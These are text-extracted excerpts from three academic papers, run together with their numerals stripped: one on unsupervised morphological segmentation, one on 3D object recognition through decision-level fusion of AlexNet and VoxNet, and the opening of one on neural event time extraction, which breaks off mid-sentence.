http://research.ics.aalto.fi/events/morphochallenge/ all segmentation points in the data. as is common in unsupervised segmentation (poon et al., ; sirts and goldwater, ), we included the test words (without their segmentations) with the train- ing words during parameter learning. baselines we compare our model with five other systems: morfessor baseline (morf-base), morfes- sor catmap (morf-cat), agmorph, the lee seg- menter and the system of poon et al. ( ). mor- fessor has achieved excellent performance on the morphochallenge dataset, and is widely used for performing unsupervised morphological analysis on various languages, even in fairly recent work (lu- ong et al., ). in our experiments, we employ two variants of the system because their relative per- formance varies across languages. we use publicly available implementations of these variants (virpi- oja et al., ; creutz and lagus, ). we perform several runs with various parameters, and choose the run with the best performance on each language. we evaluate agmorph by directly obtaining the posterior grammars from the authors. we show results for the compounding grammar, which we find has the best average performance over the lan- guages. the lee segmenter (lee et al., ), im- proved upon by using maximum marginal decoding in stallard et al. ( ), has achieved excellent per- formance on the arabic (atb) dataset. we perform comparison experiments with the model (m ) of the segmenter, which employs latent pos tags, and does not require sentence context which is not avail- able for other languages in the dataset. we obtained the code for the system, and run it on our english and turkish datasets. we do not have access to an implementation of poon et al’s system; hence, we directly report scores from their paper on the atb dataset and test our model on the same data. results table details the performance of the various mod- els on the segmentation task. we can see that our method outperforms both variants of morfessor, the grammars were trained using data we provided to them. we report numbers on arabic directly from their paper. figure : model performance vs data size obtained by frequency thresholding with an absolute gain of . %, . % and % in f- score on english, turkish and arabic, respectively. on arabic, we obtain a . % absolute improvement over poon et al.’s model. agmorph doesn’t seg- ment better than morfessor on english and arabic but does very well on turkish ( . % f compared to our model’s . %). this could be due to the fact that the compounding grammar is well suited to the agglutinative morphology in turkish and hence pro- vides more gains than for english and arabic. the lee segmenter (m ) performs the best on arabic ( % f ), but lags behind on english and turkish. this result is consistent with the fact that the system was optimized for arabic. the table also demonstrates the importance of the added semantic information in our model. for all three languages, having the features that utilize co- sine similarity provides a significant boost in perfor- mance. we also see that the transformation features and affix correlation features play a role in improv- ing the results, although a less important one. next, we study the effect of data quality on the prediction of the algorithm. a training set often contains misspellings, abbreviations and truncated words. thresholding based on frequency is com- monly used to reduce this noise. figure shows the performance of the algorithm as a function of the data size obtained at various degrees of threshold- ing. we note that the performance of the model on all three languages remains quite stable from about lang method prec recall f- english morf-base . . . morf-cat . . . agmorph . . . lee (m ) . . . model -c . . . model -t . . . model -a . . . full model . . . turkish morf-base . . . morf-cat . . . agmorph . . . lee (m ) . . . model -c . . . model -t . . . model -a . . . full model . . . arabic morf-base . . . morf-cat . . . agmorph . . . poon et al. . . . lee (m ) - - . model -c . . . model -t . . . model -a . . . full model . . . table : results on unsupervised morphological segmentation; scores are calculated across all seg- mentation points in the test data. baselines are in italics. -c=without cosine features, -t=without transformation features, -a=without affix correla- tion features. numbers on arabic for poon et al. and lee (m ) are reported directly from their papers. to training words, after which the devia- tions are more apparent. the plot also demonstrates that the model works well even with a small amount of quality data (≈ most frequent words). error analysis we look at a random subset of incorrectly segmented words in the model’s output for each language. table gives a breakup of errors in all languages due to over or under-segmentation. table provides examples of correct and incorrect segmentations predicted by our model. words with at least one segmentation point incorrect language correct segmentations incorrect segmentations word segmentation word predicted correct english salvoes salvo-es contempt con-tempt contempt negotiations negotiat-ion-s sterilizing steriliz-ing steril-iz-ing telephotograph tele-photo-graph desolating desolating desolat-ing unequivocally un-equivocal-ly storerooms storeroom-s store-room-s carsickness’s car-sick-ness-’s tattlers tattler-s tattl-er-s turkish moderni modern-i mektuplaşmalar mektuplaşma-lar mektup-laş-ma-lar teknolojideki teknoloji-de-ki gelecektiniz gelecek-tiniz gel-ecek-ti-niz burasıydı bura-sı-ydı aynalardan ayna-lar-da-n ayna-lar-dan çizgisine çiz-gi-si-ne uyuduğunuzu uyudu-ğu-nuzu uyu-duğ-unuz-u değişiklikte değişik-lik-te dirseğe dirseğe dirseğ-e arabic sy$ark s-y-$ark wryfaldw w-ry-faldw w-ryfaldw nyqwsya nyqwsya bhlwlha b-hlwl-h-a b-hlwl-ha almtrwhp al-mtrwh-p jnwby jnwb-y jnwby yteamlwa y-teaml-wa wbayrn w-bayr-n w-bayrn latnzr la-t-nzr rknyp rknyp rkny-p table : examples of correct and incorrect segmentations produced by our model on the three languages. correct segmentations are taken directly from gold morphochallenge data. lang over-segment under-segment english % % turkish % % arabic % % table : types of errors in analysis of randomly sampled incorrect segmentations for each language. the remaining errors are due to incorrect placement of segmentation points. in english, most errors are due to under- segmentation of a word. we find that around % of errors are due to roots that undergo transformations while morphing into a variant (see table for exam- ples). errors in turkish are also mostly due to under- segmentation. on further investigation, we find that most such errors ( % of the %) are due to parent words either not in vocabulary or having a very low word count (≤ ). in contrast, we observe a ma- jority of over-segmentation errors in arabic ( %). this is likely because of arabic having more sin- gle character affixes than the other languages. we find that % of errors in arabic involve a single- character affix, which is much higher than the . % that involve a two-letter affix. in contrast, % of er- rors in english are due to single character affixes – around the same number as the % of errors due to two-letter affixes. since our model is an unsupervised one, we make several simplifying assumptions to keep the candi- date set size manageable for learning. for instance, we do not explicitly model infixes, since we select parent candidates by only modifying the ends of a word. also, the root-template morphology of ara- bic, a semitic language, presents a complexity we do not directly handle. for instance, words in ara- bic can be formed using specific patterns (known as binyanim) (ex. nzr → yntzr ). however, on going through the errors, we find that only % are due to these binyanim patterns not being cap- tured. adding in transformation rules to capture these types of language-specific patterns can help in- crease both chain and segmentation accuracy. analysis of learned distributions to investigate how decisive the learnt model is, we examine the final probability distribution p(z|w) of parent can- didates for the words in the english wordlist. we observe that the probability of the best candidate (maxzp(z|w)), averaged over all words, is . . we also find that the average entropy of the distri- this might be due to the fact that the gold segmentations also do not capture such patterns. for example, the gold seg- mentation for yntzrwn is given as y-ntzr-wn, even though ntzr is not a valid root. figure : comparison of gold and predicted fre- quency distributions of the top affixes for english butions is . , which is quite low considering that the average number of candidates is . per word, which would result in a max possible entropy of around . if the distributions were uniform. this demonstrates that the model tends to prefer a single parent for every word, which is exactly the behav- ior we want. affix analysis we also analyze the various affixes produced by the model, and compare with the gold affixes. particularly, we plot the frequency distri- butions of the affixes obtained from the gold and note that the candidate probability distribution may have more than a single peak in some cases. to conserve space, we only show the distribution of suf- fixes here, but we observe a similar trend for prefixes. predicted segmentations for the english test data in figure . from the figure, we can see that our model learns to identify good affixes for the given language. sev- eral of the top affixes predicted are also present in the gold list, and we also observe similarities in the frequency distributions. conclusion in this work, we have proposed a discriminative model for unsupervised morphological segmenta- tion that seamlessly integrates orthographic and se- mantic properties of words. we use morpholog- ical chains to model the word formation process and show how to employ the flexibility of log-linear models to incorporate both morpheme and word- level features, while handling transformations of parent words. our model consistently equals or out- performs five state-of-the-art systems on arabic, en- glish and turkish. future directions of work in- clude using better neighborhood functions for con- trastive estimation, exploring other views of the data that could be incorporated, examining better predic- tion schemes and employing morphological chains in other applications in nlp. acknowledgements we thank kairit sirts and yoong keok lee for helping run experiments with their unsupervised morphological analyzers, and yonatan belinkov for helping with error analysis in arabic. we also thank the anonymous tacl reviewers and mem- bers of mit’s nlp group for their insightful com- ments and suggestions. this work was supported by the intelligence advanced research projects activ- ity (iarpa) via department of defense us army research laboratory contract number w nf- - c- . the u.s. government is authorized to reproduce and distribute reprints for governmen- tal purposes notwithstanding any copyright annota- tion thereon. the views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or im- plied, of iarpa, dod/arl, or the u.s. govern- ment. references r baayen, r piepenbrock, and l gulikers. . celex ldc l . philadelphia: linguistic data consortium. marco baroni, johannes matiasek, and harald trost. . unsupervised discovery of morphologically re- lated words based on orthographic and semantic simi- larity. corr, cs.cl/ . richard h byrd, peihuang lu, jorge nocedal, and ciyou zhu. . a limited memory algorithm for bound constrained optimization. siam journal on scientific computing, ( ): – . mathias creutz and krista lagus. . inducing the morphological lexicon of a natural language from unannotated text. in proceedings of the international and interdisciplinary conference on adaptive knowl- edge representation and reasoning (akrr), pages – . mathias creutz and krista lagus. . unsuper- vised models for morpheme segmentation and mor- phology learning. acm trans. speech lang. process., ( ): : – : , february. markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text using a dirichlet process mixture model. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational linguistics. sharon goldwater and mark johnson. . priors in bayesian learning of phonological rules. in proceed- ings of the th meeting of the acl special interest group in computational phonology: current themes in computational phonology and morphology, sig- morphon ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. yoong keok lee, aria haghighi, and regina barzi- lay. . modeling syntactic context improves morphological segmentation. in proceedings of the fifteenth conference on computational natural lan- guage learning, conll ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. minh-thang luong, richard socher, and christopher d. manning. . better word representations with re- cursive neural networks for morphology. in conll, sofia, bulgaria. mohamed maamouri, ann bies, hubert jin, and tim buckwalter. . arabic treebank: part v . ldc t . philadelphia: linguistic data consor- tium. tomas mikolov, ilya sutskever, kai chen, greg corrado, and jeffrey dean. . distributed representations of words and phrases and their compositionality. corr, abs/ . . robert parker, david graff, ke chen, junbo kong, and kazuaki maeda. . arabic gigaword fifth edition ldc t . philadelphia: linguistic data consor- tium. hoifung poon, colin cherry, and kristina toutanova. . unsupervised morphological segmentation with log-linear models. in proceedings of human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, naacl ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. haşim sak, tunga güngör, and murat saraçlar. . turkish language resources: morphological parser, morphological disambiguator and web corpus. in ad- vances in natural language processing, pages – . springer. patrick schone and daniel jurafsky. . knowledge- free induction of morphology using latent semantic analysis. in proceedings of the nd workshop on learning language in logic and the th conference on computational natural language learning - vol- ume , conll ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. kairit sirts and sharon goldwater. . minimally- supervised morphological segmentation using adaptor grammars. tacl, : – . noah a. smith and jason eisner. . contrastive estimation: training log-linear models on unlabeled data. in proceedings of the rd annual meeting on association for computational linguistics, acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. benjamin snyder and regina barzilay. . unsuper- vised multilingual learning for morphological segmen- tation. in the annual conference of the association for computational linguistics. david stallard, jacob devlin, michael kayser, yoong keok lee, and regina barzilay. . unsupervised morphology rivals supervised mor- phology for arabic mt. in proceedings of the th annual meeting of the association for computational linguistics: short papers-volume , pages – . association for computational linguistics. sami virpioja, ville t. turunen, sebastian spiegler, os- kar kohonen, and mikko kurimo. . empirical comparison of evaluation methods for unsupervised learning of morphology. tal, ( ): – . sami virpioja, peter smit, stig-arne grönroos, and mikko kurimo. . morfessor . : python imple- mentation and extensions for morfessor baseline. re- port in aalto university publication series science + technology, department of signal processing and acoustics, aalto university, helsinki, finland. international conference on sensor network and computer engineering (icsnce ) d target recognition based on decision layer fusion ma xing a* , yu fan b , yu haige, wei yanxi, yang wenhui school of computer science and engineering xi’an techonolgical university xi’an , , shaanxi e-mail: a* @qq.com; b yffshun@ .com abstract—target recognition has always been a hot research topic in computer image and pattern recognition. this paper proposes a target recognition method based on decision layer fusion. modelnet[ ]—the d cad model library,which is used to be identified. features are extracted from the model's point cloud data and multi-view images. the image is identified using the alexnet[ ] network ,the point cloud is identified by the voxnet[ ] network. the fusion algorithm is used in the decision layer to complete the fusion of features. the results show that the proposed method improves the accuracy of object recognition. keywords-target recognition; convolutional neural network; decision fusion i. introduction at present, the methods for identifying objects are mainly divided into two categories. the first is to identify the images generated by the objects, and the second is to identify the point clouds generated by the objects. in terms of image recognition, the current deep learning method has a high recognition rate. for instance, xie etal. [ ] adopt the multi-view depth image representation and propose multi-view deepextreme learning machine (mvd-elm) to achieve fast and quality projective feature learning for d shapes. zhu et al.[ ] alsoproject d shapes into d space and use autoencoder for featurelearning on d images. in , the imagenet contest champion model--alexnet became a classical convolutional neural network image classification model. for the identification of point clouds, domestic and foreign scholars have done a lot of research. some scholars use the method of manually extracting features to classify and identify. r.b.rusu[ ]and others used the relationship between the normal vectors of a region as a feature to classify objects for recognition. yasir salihet al. [ ] used vfh as a feature and used a support vector machine as a classifier to classify and recognize point clouds. manually extracting features requires very professional knowledge and rich experience. convolutional neural networks can automatically extract features and classify them, and they are invariant to displacements, scaling, and other forms of rigid body changes. some experts and scholars have used convolutional neural networks to classify and recognize point cloud images, of which the voxnet network has the highest recognition rate. the above method achieves higher accuracy in target classification recognition. i have seen that image recognition is affected by factors such as lighting and viewing angles. the accuracy of point cloud recognition is lower than that of image recognition. therefore, this paper integrates the image and the point cloud at the decision-making level to improve the accuracy of object recognition. ii. network structure a. convolutional neural network traditional shallow learning methods such as support vector machines require manually extracting image features and then sending the features into the classifier for training. this leads to a problem that the manually extracted feature is not necessarily the best description of the current image. even if the selected feature is very suitable for the current image, when the external conditions of the object such as the angle, size, and illumination of the image change, the manually selected feature cannot adapt well to this change, and it is necessary to artificially adjust the selected feature according to the situation. different from the traditional shallow learning method, the input of the convolutional neural network is the entire image. it continuously adjusts the parameters of the network through a learning algorithm and adaptively extracts the most significant features of the current image, which avoids manual intervention and saves a large amount of manpower, with the continuous updating of the input pictures, the essential features of the current picture are extracted with the times, ensuring the accuracy and efficiency of the recognition. as a special architecture that is particularly suitable for classifying images, compared with conventional shallow machine learning methods such as support vector machines, convolutional neural networks can be much smaller than normal when faced with large-scale high-resolution image classification problems. the method learns more picture information in the training time, and the classification accuracy is higher than the conventional method, which is due to its unique network architecture. the convolutional neural network consists of three parts: the convolutional layer, the down-sampling layer and the fully connected layer. the down-sampling is usually after the convolutional layer, alternating with the convolutional layer, and finally connected to the fully connected layer. convolutional neural networks use local connections, weight sharing, and spatial or temporal correlation down-sampling to obtain good translation, scaling, and distortion invariance, making the extracted features more distinguishable. cnns international conference on sensor network and computer engineering (icsnce ) training includes forward propagation. the two processes of forward propagation and reverse propagation are the process of the input signal output from the input layer, through several hidden layers, and the output layer. the reverse propagation is the process of back propagation of the error signal from the output layer to the input layer. it mainly uses errors. the back propagation (error back propagation, ebp) algorithm and gradient descent adjust the weights at each level of the network and is similar to the training process of an ordinary neural network. b. alexnet network structure the standard convolutional neural network(cnn) is a special multilayer feed forward neural network. it has a deep network structure and is generally composed of an input layer, a convolutional layer, a down-sampling layer, a fully connected layer, and an output layer. the convolutional layer, the down-sampling layer, and the fully connected layer are hidden layers. alexnet uses two gpu services. the model is divided into eight layers, five convolutional layers and three fully connected layers. each convolutional layer contains the excitation function relu and local response normalization (lrn) processing, and then after down-sampling (pool). the network structure designed in this paper is shown in figure . figure . multi-view image network structure diagram the input layer are images, there are convolutional layers. the number of feature maps are , , , ,and features respectively. the convolution kernel sizes respectively are , , , , and ,below the first two convolutional layers there is a largest pooled layer with an lrn layer for localized normalization. the largest pooled layer is to take the maximum value of the feature points in the domain. after processing through the convolution layer, many features are obtained. the amount of direct calculation is very large, and the increase of features is particularly prone to overfitting. therefore, the network constructed in this paper is each time a convolution process is performed, a max-pooling layer is added. the dropout layer has a discard rate of . . dropout temporarily discards some networks in the training process with a certain probability, and each mini-batch discards different networks. it can reduce the amount of calculation, and more importantly it can prevent over-fitting. the number of neurons in two fully connected layers is and , respectively. the last output layer is the softmax[ ]layer, which does not directly output the classification of the identified image, but rather the probability that the output image belongs to each classification. c. voxnet network structure figure shows the network structure of voxnet. the input layer accepts data as a form. there are a total of two convolutional layers, and the number of feature maps is , using the sum of the convolution kernels. the dropout layer discard rates are . and . , respectively, to prevent overfitting while reducing the amount of computation. the largest pooled layer, the filter used. finally, there is a fully connected layer with neurons and a dropout layer with a discard rate of . . the seventh layer is the output layer and the number of neurons is . input layer cov d layer dropout layer cov d layer fully layer dropout layer max pool d layer dropout layer output layer figure . voxnet network structure diagram d. network convergence structure multi sensor information fusion is to extract and integrate the same target image with a multi-source information channel for further processing. information fusion can be divided into three layers: the fusion based on data layer, the fusion based on the feature layer, and the fusion based on the decision layer. the level of fusion was from low to high. so this paper uses the method of decision layer fusion. the feature fusion of the decision layer is usually the fusion of the prediction results of multiple classifiers. we extract various features from feature extraction algorithm. we assume that all kinds of features are independent of each other, and these features can separately predict the result of recognition separately. on this basis, we send data into their respective classifiers, get the prediction results of each classifier, then combine all the classifier's prediction to get the final recognition results, and complete the fusion of multiple features in the decision level. as shown in figure , point cloud is extracted from voxnet using point cloud feature, and alexnet is used to extract image features. softmax regression model is used to complete recognition and classification respectively. the fusion algorithm is used in the decision layer to complete the fusion of features. international conference on sensor network and computer engineering (icsnce ) figure . fusion model iii. . experiments a. experiment environement the environment used in this experiment was tensorflow-gpu . . open source software library, windows operating system, and nvidia gtx graphics card. the data used in the experiment was modelnet of princeton university. modelnet is a large-scale d cad model database, similar to imagenet in d images. b. experiment datasets this article uses the modelnet dataset, where the point cloud dataset is from the dataset in pointnet[ ], and the d image is from multi-view. on the topside of figure is the point cloud image, at the bottom is a two-dimensional image. figure . point cloud image and two-dimensional image c. linear combination coefficient selection static linear combination of the results of the alexnet network and voxnet network prediction results in the final prediction. before linear combination, we need to determine the coefficients of each classifier's prediction result, which controls the relative importance of the results predicted by each classifier. it is very important to choose a suitable coefficient. the appropriate coefficient can fully exert the advantages of each classifier and make a joint decision. the final recognition accuracy rate will be better than the recognition accuracy of a single classifier. the use of inappropriate coefficients will result in the classification accuracy of the final joint decision even lower than that of a single classifier. there will be a softmax classifier at the last level of the alexnet and voxnet network. for each input sample, the output of the softmax classifier is a probability vector , that the sample may belong to. where represents the probability that the sample belongs to class n, and n represents the number of classes of all samples. with , the sum of the probabilities that a sample belongs to all classes is . in the object recognition of a single classifier, we will choose the probability. the class label corresponding to the largest element in the vector is the class corresponding to the sample. in this chapter, for each test sample, the obtained recognition rate results are 、 , and the coefficients of each classifier are α and β respectively. then we can complete the fusion of all base classifiers according to eq. .   after the fusion is complete, we get a k-dimensional vector, where n is the number of categories. we take the largest element among them as the final sample tag. d. recognition results in order to test the accuracy of this experimental method, the method of this paper is compared with the recognition accuracy of voxnet and alexnet. the experimental results are shown in table . table i. accuracy of different methods recognition methods accuracy rate/% alexnet voxnet in this paper, the coefficients α and β before alexnet and voxnet are set to different values, the method with higher accuracy is used to set larger coefficients, the method with lower accuracy is set with smaller coefficients, and the comparison between different combinations of coefficients is international conference on sensor network and computer engineering (icsnce ) accurate for the network. influences. the experimental results are shown in table . table ii. effects of different combinations of coefficients on network accuracy weight( ) accuracy/% ( . , . ) . ( . , . ) . ( . , . ) ( . , . ) . ( . , . ) . from table , the network has the highest recognition rate when α and β are set to . and . . compare this method with the recognition accuracy of voxnet and alexnet. experimental results show that this method has the highest recognition rate. iv. conclusion this paper presents a decision-level three-dimensional target fusion algorithm, we using different convolutional neural network frameworks to extract point cloud features and visual features of three-dimensional objects, respectively, and finally achieved effective fusion. experimental results show that feature fusion in the decision-making layer is also an effective feature fusion method. this method improves the accuracy of object recognition. in the process of integration, a method with a higher recognition accuracy rate sets a larger coefficient, and a method with a low recognition accuracy rate sets a smaller coefficient, and the final accuracy rate is the highest. references [ ] z. wu, s. song, a. khosla, f. yu, l. zhang, x. tang and j. xiao. d shapenets: a deep representation for volumetric shapes. cvpr . [ ] krizhevsky a, sutskever i, hinton g e. imagenet classification with deep convolutional neural networks[c]// international conference on neural information processing systems. curran associates inc. : - . [ ] d. maturana and s. scherer. voxnet: a d convolutional neural network for real-time object recognition. iros . [ ] h. su, s. maji, e. kalogerakis, e. learned-miller. multi-view convolutional neural networks for d shape recognition. iccv . [ ] charles r. qi, hao su, kaichun mo, and leonidas j. guibas. pointnet: deep learning on point sets for d classification and segmentation. cvpr . [ ] z. xie, k. xu, w. shan, l. liu, y. xiong, h. huang, projective feature learning for d shapes with multiview depth images, in: computer graphics forum, vol. , wiley online library, , pp. – . [ ] z. zhu, x. wang, s. bai, c. yao, x. bai, deep learning representation using autoencoder for d shape retrieval, in: proceedings of the international conference on security, pattern analysis, and cybernetics(spac), ieee, , pp. – . [ ] holz d, holzer s, rusu r b, et al. real-time plane segmentation using rgb-d cameras[c]// robot soccer world cup xv. springer-verlag, : - . [ ] salih y, malik a s. comparison of stochastic filtering methods for d tracking[j]. pattern recognition, , ( – ): - . [ ] c. r. qi, h. su, m. nießner, a. dai, m. yan, and l. guibas.volumetric and multi-view cnns for object classification on d data. in proc. computer vision and pattern recognition (cvpr), ieee, . [ ] http://www.cnblogs.com/graphics/archive/ / / / .html the princeton modelnet. http://modelnet.cs. [ ] the princeton modelnet. http://modelnet.cs. [ ] r. b. girshick, j. donahue, t. darrell, and j. malik. rich feature hierarchies for accurate object detection and semantic segmentation. in proc. cvpr, . http:// dshapenets.cs.princeton.edu/ http:// dshapenets.cs.princeton.edu/ http://danielmaturana.net/extra/voxnet_maturana_scherer_iros .pdf http://danielmaturana.net/extra/voxnet_maturana_scherer_iros .pdf http://people.cs.umass.edu/~kalo/papers/viewbasedcnn/index.html http://people.cs.umass.edu/~kalo/papers/viewbasedcnn/index.html https://arxiv.org/abs/ . https://arxiv.org/abs/ . event time extraction with a decision tree of neural classifiers nils reimers†, nazanin dehghani‡∗, iryna gurevych† † ubiquitous knowledge processing lab (ukp) and research training group aiphes department of computer science, technische universität darmstadt ‡ school of electrical and computer engineering, university of tehran www.ukp.tu-darmstadt.de abstract extracting the information from text when an event happened is challenging. documents do not only report on current events, but also on past events as well as on future events. often, the relevant time information for an event is scattered across the document. in this paper we present a novel method to auto- matically anchor events in time. to our knowl- edge it is the first approach that takes tempo- ral information from the complete document into account. we created a decision tree that applies neural network based classifiers at its nodes. we use this tree to incrementally infer, in a stepwise manner, at which time frame an event happened. we evaluate the approach on the timebank-eventtime corpus (reimers et al., ) achieving an accuracy of . % com- pared to an inter-annotator agreement (iaa) of . %. for events that span over a single day we observe an accuracy improvement of . points compared to the state-of-the-art caevo system (chambers et al., ). without re- training, we apply this model to the semeval- task on automatic timeline generation and achieve an improvement of . points f -score compared to the state-of-the-art. our code is publically available. introduction knowing when an event happened is useful for a lot of use cases. examples are in the fields of time-aware information retrieval, text summarization, automated timeline generation, and automatic knowledge base population. many facts in a knowledge base are ∗during author’s internship in the research training group aiphes at ukp lab, tu darmstadt. https://github.com/ukplab/ tacl -event-time-extraction only true for a certain time period, for example the presidency of a person. hence, the population of a knowledge base can highly benefit from high quality event and event time extraction (surdeanu, ). inherent to events is the connection to time. allan ( ) defines an event as “something that happens at some specific time and place”. the challenges for automatic event time extraction are manifold. the temporal information in news articles which states when an event happened is, in most cases, not in the same or in neighboring sentences with the event (reimers et al., ). it can be mentioned far before the event or far after the event. even worse, for more than % of events, the specific day at which the event happened is not mentioned. however, from the world knowledge and causal relations, the reader can infer a lot of temporal information about those events and can often infer that the event happened before or after some specific point in time. in this paper we describe a new classifier for auto- matic event time extraction. we use the timebank- eventtime corpus (reimers et al., ) to train and evaluate our proposed architecture. in contrast to other corpora on temporal relations, the annota- tion of the timebank-eventtime corpus does not make restrictions where, and in which form, tempo- ral information for an event must be provided. the annotators were allowed to take the whole document into account and were asked to answer, to the best of their ability, the question at which date or time period the event happened. the event time annotation for some sample events is shown in the following: • he was [sent] - - into space on may , we will refer to the temporal information when an event happened as event time. transactions of the association for computational linguistics, vol. , pp. – , . action editor: patrick pantel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. . he [spent]endpoint = - - beginpoint= - - six days aboard the salyut spacecraft. • [...] two areas [expected]endpoint =before - - beginpoint=before - - to be hardest [hit]after - - before - - when the effects of the asian crisis [...]. this annotation imposes several challenges for an automatic approach: . the number of possible labels is infinite, as date values are part of the labels. . due to the diverse types of events and due to varying temporal information for events, the structure of the labels varies. . temporal information from the whole document must be taken into account. . for . % of the events, the event time label is a combination of several temporal clues. an example could be that the annotator combined that the person went missing on the th and that the person went missing in the month of august. however, nowhere in text is the th of august explicitly mentioned. the main contribution of this paper is the proposal of a novel combination of a decision tree combined with neural network classifiers for the nodes to solve the afore-mentioned challenges. to our knowledge, this is the first system that works on the complete document and can extract long-range relations be- tween events and temporal expressions. further, it is the first system that focuses on extracting begin and end points for events that span over multiple days. evaluated on the timebank-eventtime corpus (reimers et al., ), it achieves an accuracy of . % compared to an inter-annotator agreement (iaa) of . %. compared to the state-of-the-art caevo system (chambers et al., ), we observe a substantial improvement in accuracy of . per- centage points for events that happened on a single day. for multi-day events, we observe an accuracy of . % using a strict metric. we show that the proposed model generalizes well to new tasks and textual domains. we applied it without re-training to the semeval- task on automatic timeline generation. there, it achieves an improvement of . points f -score compared to the state-of-the-art. related work we start with a review on common annotation schemes to capture temporal information for events in documents. afterwards, we present related work on automatically extracting temporal information for events. . annotation of events and temporal information one of the most widely used specifications for events and temporal expressions is timeml (saurı́ et al., ). it provides specifications for the annotation of events, temporal expressions, and the temporal links (tlink). an event is defined as term for situations that happen or occur. temporal expressions, such as times, dates, or durations, are annotated and their temporal values are normalized using the definitions of ferro ( ). a tlink is the relation between two events, between an event and a temporal expres- sion, or between two temporal expressions. timeml defines different relation types, however, most corpora which are using the timeml specification restrict the number of relations to a smaller set. a prominent corpus using the timeml specifica- tions is the timebank corpus (pustejovsky et al., ), which was also the basis for the three shared tasks tempeval- (verhagen et al., ), tempeval- (verhagen et al., ) and tempeval- (uzzaman et al., ). a drawback of tlinks is the quadratic growth of possible tlinks with the number of events and tem- poral expressions, resulting in more than , pos- sible tlinks for several documents in the timebank corpus. as the annotation of such a large number of tlinks would be impractical, annotation of those is always restricted in some form. for the timebank corpus, only salient tlinks were annotated. which links are salient isn’t well defined and a low agree- ment between annotators can be observed. the three tempeval shared tasks tried to improve the coverage and added some further temporal links for mentions in the same sentence. more dense annotations were applied by bramsen et al. ( ), kolomiyets et al. ( ), do et al. ( ) and cassidy et al. ( ). while bramsen et al., kolomiyets et al., and do et al. only annotated some temporal links, cassidy et al. an- notated all event-event, event-time, and time-time pairs in the same sentence as well as in the directly succeeding sentence leading to the densest annota- tion for the timebank corpus. they used six differ- ent relation types: before, after, includes, is included, simultaneous, and vague, where vague encodes that the annotators were not able to make a statement on the temporal relation of the pair. . existent event time extraction systems most automatic approaches use the previously in- troduced tlinks to train and evaluate systems for extracting temporal information about events. for a new document, the system first extracts the temporal relations between events and temporal expressions. in a post-processing step, those tlinks are used to retrieve the information when an event happened. extracting the relations is often formulated as a pair-wise classification task. each pair of events and/or temporal expressions is examined and classi- fied according to the available relation classes. ensur- ing transitivity is a big challenge when formulating this task as a pair-wise classification task. one sim- ple but nonetheless frequently used solution is to automatically infer all temporal relations that can be derived from transitivity. some systems have tried to take advantage of global information to ensure transi- tivity using markov logical networks or integer linear programming (bramsen et al., ; chambers and jurafsky, ; yoshikawa et al., ; uzzaman and allen, ). however, the gains were minor. chambers et al. ( ) proposes the caevo- system, a sieve-based-architecture that blends mul- tiple classifiers into a precision-ranked cascade of sieves. the system was trained and evaluated on the timebank-dense corpus and created a dense tlink annotation for all pairs of events and/or temporal ex- pressions in the same and in adjacent sentences. the code is publically available. a bottleneck of current systems is the limitation to tlinks for pairs that are in the same or in adjacent sentences. according to reimers et al. ( ) . % of the events happen at the document creation time (dct). for the remaining . % of events, the event time must be inferred via tlinks. however, for http://www.usna.edu/users/cs/nchamber/ caevo/ . % of those events the most informative time ex- pression is not in the same nor in the previous/next sentence. in conclusion, for . % of all the events in a text it would be necessary to take long-range tlinks into account to correctly retrieve the event time. extending existing systems to take long-range relations into account is difficult due to a lack of training and evaluation data. event time annotation we use the timebank-eventtime corpus (reimers et al., ) to evaluate our architecture for automatic event time extraction. the timebank-eventtime corpus does not use the concept of tlinks, instead, for every event, the annotators were asked to anchor the event in time as precisely as possible. the annotation distinguishes between events that happened on a single day and multi-day events that span over multiple days. for single day events, the annotators provide the day the event happened in the format yyyy-mm-dd. in the case the exact date is not mentioned in the document, the annotators were asked to anchor the event in time as precisely as possible using the annotation before yyyy-mm-dd and after yyyy-mm-dd. before notes that the event must have happened before the stated date and after that the event must have happened after the date. a combination of before and after is possible. for multi-day events, the annotators were asked to provide the begin and the end point of the event. as for single day events, they were allowed to use the before and after notation in the case the explicit begin/end point is not mentioned in the document. the annotated corpus contains news articles and tv broadcast transcripts from various sources written mainly between january and april . the shortest document has five sentences, while the longest has sentences. a label distribution can be found in (reimers et al., ). automatic event time extraction in this section we first present our hierarchical tree approach to automatically infer the event times in the most informative temporal expression is defined as the temporal expression giving the reader the information at which date, or in which time frame, the event happened. a document. in section . we present two base- lines that we use for comparison: the first uses dense tlinks extracted by the caevo system and the second baseline is a reduced version of the presented tree approach. . event time extraction using trees we use the tree structure depicted in figure to extract the event time for a given target event. the structure was inspired by how annotators labeled the data. when annotating the text, the first decision is typically whether the event is a single day event or a multi-day event. in the case that it is a single day event, the next question is whether the event happened at the document creation time (dct) or not. as the annotated data comes from the news domain, a large set of events ( . % of the single day events) happened at the document creation time. in the case the event did not happen at dct, then the annotator scanned the text to decide whether the date when the event happened is explicitly mentioned or not. if it is not mentioned, the annotator used the before and after notation to define the time frame when the event happened as precisely as possible. for multi-day events, the process is similar to determine the begin and end point of the event. the first classifier is a binary classifier to decide whether the event is a single or a multi-day event. in the case it is a single day event, the next classifier decides the relation between the event and the doc- ument creation time (dct). in the case the event happened at dct, the architecture stops. if the event happened before or after dct, the next classifier is invoked, detecting which temporal expressions are relevant. for all relevant temporal expressions, it is then determined whether the event happened simul- taneously, before, or after the temporal expressions. the final step ( . ) outputs a single event time by narrowing down the information it receives from the relation to dct ( . ) and the pool of relevant tempo- ral expressions and relations ( . ). for multi-day events the process is similar, how- ever, the system must return the begin and the end points. the system runs three processes in parallel: it extracts the relations to relevant time expressions for the begin point ( . . and . . ); it extracts the relation to dct ( . ) and; it extracts the relations to relevant time expressions for the end point ( . . and . . ). there are three possible relations between a multi-day event and the dct: the event started and ended before the dct; it started and ended after the dct; or it started before dct and ended after dct. this information is taken into account in step . . and . . when producing single begin point and end point information for the given event. . local classifiers this section describes the different local classifiers applied in our tree structure. for all except the nar- row down classifier, we used the convolutional neu- ral networks architecture (lecun, ) 